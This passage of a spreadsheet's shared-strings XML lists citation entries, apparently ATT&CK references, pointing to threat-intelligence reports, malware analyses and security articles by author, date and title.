    <t>Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.</t>
  </si>
  <si>
    <t>Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.</t>
  </si>
  <si>
    <t>Michael Stump. (2003). Information Security Reading Room Securing SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Pilkington, M. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016.</t>
  </si>
  <si>
    <t>Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.</t>
  </si>
  <si>
    <t>U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.</t>
  </si>
  <si>
    <t>Baumgartner, K., Guerrero-Saade, J. (2015, March 4). Who’s Really Spreading through the Bright Star?. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.</t>
  </si>
  <si>
    <t>Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.</t>
  </si>
  <si>
    <t>Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.</t>
  </si>
  <si>
    <t>ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.</t>
  </si>
  <si>
    <t>SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.</t>
  </si>
  <si>
    <t>SSH.COM. (n.d.). SSH tunnel. Retrieved March 15, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.</t>
  </si>
  <si>
    <t>Adam Boileau. (2005, August 5). Trust Transience:  Post Intrusion SSH Hijacking. Retrieved December 19, 2017.</t>
  </si>
  <si>
    <t>SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Unified Compliance Framework. (2016, December 20). The audit system must be configured to audit the loading and unloading of dynamic kernel modules.. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>UCF. (n.d.). The password for the krbtgt account on a domain must be reset at least every 180 days. Retrieved November 5, 2020.</t>
  </si>
  <si>
    <t>SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018.</t>
  </si>
  <si>
    <t>Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.</t>
  </si>
  <si>
    <t>Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.</t>
  </si>
  <si>
    <t>Schneider Electric. (2018, August 24). Security Notification – USB Removable Media Provided With Conext Combox and Conext Battery Monitor. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration Files. Retrieved February 25, 2021.</t>
  </si>
  <si>
    <t>Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>SecTools. (2003, June 11). NBTscan. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>Kanthak, S. (2015, December 8). Executable installers are vulnerable^WEVIL (case 7): 7z*.exe	allows remote code execution with escalation of privilege. Retrieved March 10, 2017.</t>
  </si>
  <si>
    <t>Prakash, T. (2017, June 21). Run commands on Windows system remotely using Winexe. Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.</t>
  </si>
  <si>
    <t>National Security Agency. (2016, May 4). Secure Host Baseline EMET. Retrieved June 22, 2016.</t>
  </si>
  <si>
    <t>Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.</t>
  </si>
  <si>
    <t>Mamedov, O. Sinitsyn, F.  Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021.</t>
  </si>
  <si>
    <t>Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019.</t>
  </si>
  <si>
    <t>GReAT. (2017, November 1). Silence – a new Trojan attacking financial organizations. Retrieved May 24, 2019.</t>
  </si>
  <si>
    <t>Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelgänging technique. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t xml:space="preserve">SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19 </t>
  </si>
  <si>
    <t>SecureWorks. (n.d.). Threat Profile - BRONZE MOHAWK. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.</t>
  </si>
  <si>
    <t>SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.</t>
  </si>
  <si>
    <t xml:space="preserve"> Drew Todd. (2021, December 28). How Secure Is Your Slack Channel?. Retrieved May 31, 2022.</t>
  </si>
  <si>
    <t>Global Research and Analysis Team . (2018, April 12). APT Trends report Q1 2018. Retrieved January 27, 2021.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.</t>
  </si>
  <si>
    <t>Gostev, A.. (2014, March 12). Agent.btz: a Source of Inspiration?. Retrieved April 8, 2016.</t>
  </si>
  <si>
    <t>Baumgartner, K. and Garnaeva, M.. (2015, February 17). BE2 extraordinary plugins, Siemens targeting, dev fails. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Baumgartner, K. and Garnaeva, M.. (2014, November 3). BE2 custom plugins, router abuse, and target profiles. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.</t>
  </si>
  <si>
    <t>Kuzin, M., Zelensky S. (2018, July 20). Calisto Trojan for macOS. Retrieved September 7, 2018.</t>
  </si>
  <si>
    <t>Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018.</t>
  </si>
  <si>
    <t>Shulmin, A., Yunakovsky, S. (2017, April 28). Use of DNS Tunneling for C&amp;C Communications. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Ladikov, A. (2015, January 29). Why You Shouldn’t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Konstantin Zykov. (2019, September 23). Hello! My name is Dtrack. Retrieved January 20, 2021.</t>
  </si>
  <si>
    <t>KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.</t>
  </si>
  <si>
    <t>Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019.</t>
  </si>
  <si>
    <t>Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.</t>
  </si>
  <si>
    <t>Kaspersky Global Research and Analysis Team. (2014, August 20). El Machete. Retrieved September 13, 2019.</t>
  </si>
  <si>
    <t>Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.</t>
  </si>
  <si>
    <t>Lozhkin, S.. (2015, July 16). Minidionis – one more APT with a usage of cloud drives. Retrieved April 5, 2017.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.</t>
  </si>
  <si>
    <t>Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>GReAT. (2017, August 15). ShadowPad in corporate networks. Retrieved March 22, 2021.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.</t>
  </si>
  <si>
    <t>Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2018, October 04). Shedding Skin – Turla’s Fresh Faces. Retrieved November 7, 2018.</t>
  </si>
  <si>
    <t>Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2017, February 8). Fileless attacks against enterprise networks. Retrieved February 8, 2017.</t>
  </si>
  <si>
    <t>Carvey, H.. (2014, September). Where You AT?: Indicators of Lateral Movement Using at.exe on Windows 7 Systems. Retrieved November 27, 2019.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.</t>
  </si>
  <si>
    <t>Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION’s Toolbox. Retrieved September 24, 2019.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2018, August 24). Back to School: COBALT DICKENS Targets Universities. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, September 11). COBALT DICKENS Goes Back to School…Again. Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>Mclellan, M.. (2018, November 19). Lazy Passwords Become Rocket Fuel for Emotet SMB Spreader. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021.</t>
  </si>
  <si>
    <t>CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.</t>
  </si>
  <si>
    <t>Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.</t>
  </si>
  <si>
    <t>Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.</t>
  </si>
  <si>
    <t>Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.</t>
  </si>
  <si>
    <t>Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.</t>
  </si>
  <si>
    <t>Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.</t>
  </si>
  <si>
    <t>Secureworks CTU. (2021, May 28). USAID-Themed Phishing Campaign Leverages U.S. Elections Lure. Retrieved February 24, 2022.</t>
  </si>
  <si>
    <t>Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.</t>
  </si>
  <si>
    <t>Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.</t>
  </si>
  <si>
    <t>Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.</t>
  </si>
  <si>
    <t>Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.</t>
  </si>
  <si>
    <t>Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.</t>
  </si>
  <si>
    <t>Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>Counter Threat Research Team. (2017, June 28). NotPetya Campaign: What We Know About the Latest Global Ransomware Attack. Retrieved June 11, 2020.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.</t>
  </si>
  <si>
    <t>Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Paganini, P. (2012, September 9). Elderwood project, who is behind Op. Aurora and ongoing attacks?. Retrieved February 13, 2018.</t>
  </si>
  <si>
    <t>Paganini, P. (2019, July 7). Croatia government agencies targeted with news SilentTrinity malware. Retrieved March 23, 2022.</t>
  </si>
  <si>
    <t>Meskauskas, T.. (2020, October 29). Egregor: Sekhmet’s Cousin. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.</t>
  </si>
  <si>
    <t>Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.</t>
  </si>
  <si>
    <t>Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>This designation has been used in reporting both to refer to the threat group ([APT28](https://attack.mitre.org/groups/G0007)) and its associated malware.(Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>Rascagnères, P.. (2016, October 27). Rootkit analysis: Use case on HideDRV. Retrieved March 9, 2017.</t>
  </si>
  <si>
    <t>Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.</t>
  </si>
  <si>
    <t>Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved February 4, 2019.</t>
  </si>
  <si>
    <t>Stalmans, E. (2017, October 11). Outlook Home Page – Another Ruler Vector. Retrieved February 4, 2019.</t>
  </si>
  <si>
    <t>El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. Retrieved November 22, 2017.</t>
  </si>
  <si>
    <t>SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.</t>
  </si>
  <si>
    <t>Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Walter, J.. (2020, July 23). WastedLocker Ransomware: Abusing ADS and NTFS File Attributes. Retrieved September 14, 2021.</t>
  </si>
  <si>
    <t>Walter, J. (2020, August 10). Agent Tesla | Old RAT Uses New Tricks to Stay on Top. Retrieved December 11, 2020.</t>
  </si>
  <si>
    <t>Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.</t>
  </si>
  <si>
    <t>Chen, Joey. (2022, June 9). Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years. Retrieved July 14, 2022.</t>
  </si>
  <si>
    <t>Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020.</t>
  </si>
  <si>
    <t>Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware &amp; Data Theft Into One. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis &amp; Internals. Retrieved September 8, 2020.</t>
  </si>
  <si>
    <t>Guerrero-Saade, J. (2022, February 23). HermeticWiper | New Destructive Malware Used In Cyber Attacks on Ukraine. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.</t>
  </si>
  <si>
    <t>Stokes, P. (2021, November 15). Infect If Needed | A Deeper Dive Into Targeted Backdoor macOS.Macma. Retrieved June 30, 2022.</t>
  </si>
  <si>
    <t>Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.</t>
  </si>
  <si>
    <t>Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020.</t>
  </si>
  <si>
    <t>Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.</t>
  </si>
  <si>
    <t>Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021.</t>
  </si>
  <si>
    <t>Johann Rehberger. (2020, September 23). Beware of the Shadowbunny - Using virtual machines to persist and evade detections. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Adair, S., Moran, N. (2012, May 15). Cyber Espionage &amp; Strategic Web Compromises – Trusted Websites Serving Dangerous Results. Retrieved March 13, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021.</t>
  </si>
  <si>
    <t>Jaron Bradley. (2021, April 26). Shlayer malware abusing Gatekeeper bypass on macOS. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Shodan. (n.d.). Shodan. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Elastic. (n.d.). Shortcut File Written or Modified for Persistence. Retrieved June 1, 2022.</t>
  </si>
  <si>
    <t>BlackB0lt. (2022, April 15). https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml. Retrieved June 1, 2022.</t>
  </si>
  <si>
    <t>Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.</t>
  </si>
  <si>
    <t>Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved February 4, 2019.</t>
  </si>
  <si>
    <t>Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited's Patient Database. Retrieved June 29, 2020.</t>
  </si>
  <si>
    <t>Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.</t>
  </si>
  <si>
    <t>Duarte, H., Morrison, B. (2012). (Mis)trusting and (ab)using ssh. Retrieved January 8, 2018.</t>
  </si>
  <si>
    <t>smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.</t>
  </si>
  <si>
    <t>This designation has been used in reporting both to refer to the threat group ([APT28](https://attack.mitre.org/groups/G0007)) and its associated malware.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)(Citation: Securelist Sofacy Feb 2018)</t>
  </si>
  <si>
    <t>Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.</t>
  </si>
  <si>
    <t>Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.</t>
  </si>
  <si>
    <t>Cimpanu, C.. (2016, September 9). Cryptocurrency Mining Malware Discovered Targeting Seagate NAS Hard Drives. Retrieved October 12, 2016.</t>
  </si>
  <si>
    <t>Sogeti. (2021, March). Babuk Ransomware. Retrieved August 11, 2021.</t>
  </si>
  <si>
    <t>SolarWinds. (2020, December 24). SolarWinds Security Advisory. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021.</t>
  </si>
  <si>
    <t>Ducklin, P. (2020, October 2). Serious Security: Phishing without links – when phishers bring along their own web pages. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Ducklin, P. (2015, April 20). Notes from SophosLabs: Dyreza, the malware that discriminates against old computers. Retrieved June 16, 2020.</t>
  </si>
  <si>
    <t>Brandt, A.. (2019, May 5). Emotet 101, stage 4: command and control. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals target you based on where you live. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Szappanos, G. &amp; Brandt, A. (2021, March 1). “Gootloader” expands its payload delivery options. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020.</t>
  </si>
  <si>
    <t>Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020.</t>
  </si>
  <si>
    <t>Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They’re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.</t>
  </si>
  <si>
    <t>Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.</t>
  </si>
  <si>
    <t>jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020.</t>
  </si>
  <si>
    <t>SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.</t>
  </si>
  <si>
    <t xml:space="preserve"> Palotay, D. and Mackenzie, P. (2018, April). SamSam Ransomware Chooses Its Targets Carefully. Retrieved April 15, 2019.</t>
  </si>
  <si>
    <t>Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.</t>
  </si>
  <si>
    <t>Wyke, J. (2012, April). ZeroAccess. Retrieved July 18, 2016.</t>
  </si>
  <si>
    <t>Rootkit Hunter Project. (2018, February 20). The Rootkit Hunter project. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Sourceforge. (n.d.). Heyoka POC Exfiltration Tool. Retrieved October 11, 2022.</t>
  </si>
  <si>
    <t xml:space="preserve">
(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Luke Paine. (2020, March 11). Through the Looking Glass — Part 1. Retrieved March 17, 2022.</t>
  </si>
  <si>
    <t>Andy Robbins. (2021, October 12). Azure Privilege Escalation via Service Principal Abuse. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Schroeder, W. &amp; Christensen, L. (2021, June 22). Certified Pre-Owned - Abusing Active Directory Certificate Services. Retrieved August 2, 2022.</t>
  </si>
  <si>
    <t>Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021.</t>
  </si>
  <si>
    <t>Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.</t>
  </si>
  <si>
    <t>Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.</t>
  </si>
  <si>
    <t>Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.</t>
  </si>
  <si>
    <t>Atkinson, J. (2017, July 18). Host-based Threat Modeling &amp; Indicator Design. Retrieved March 21, 2018.</t>
  </si>
  <si>
    <t>Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.</t>
  </si>
  <si>
    <t>Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>Stoner, J. (2021, January 21). Detecting Supernova Malware: SolarWinds Continued. Retrieved February 22, 2021.</t>
  </si>
  <si>
    <t>Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.</t>
  </si>
  <si>
    <t>Baumgartner, K.. (2015, June 17). The Spring Dragon APT. Retrieved February 15, 2016.</t>
  </si>
  <si>
    <t>Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Stack Exchange - Security. (2012, July 31). What are the methods to find hooked functions and APIs?. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware campaign operating covertly since 2012. Retrieved November 16, 2017.</t>
  </si>
  <si>
    <t>Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.</t>
  </si>
  <si>
    <t>hoakley. (2021, September 16). How to run an app or tool at startup. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>Jeff Warren. (2019, June 27). Cracking Active Directory Passwords with AS-REP Roasting. Retrieved August 24, 2020.</t>
  </si>
  <si>
    <t>Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.</t>
  </si>
  <si>
    <t>Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.</t>
  </si>
  <si>
    <t>Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>Stewart, A. (2014). DLL SIDE-LOADING: A Thorn in the Side of the Anti-Virus Industry. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.</t>
  </si>
  <si>
    <t>Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit in the Wild. Retrieved April 26, 2019.</t>
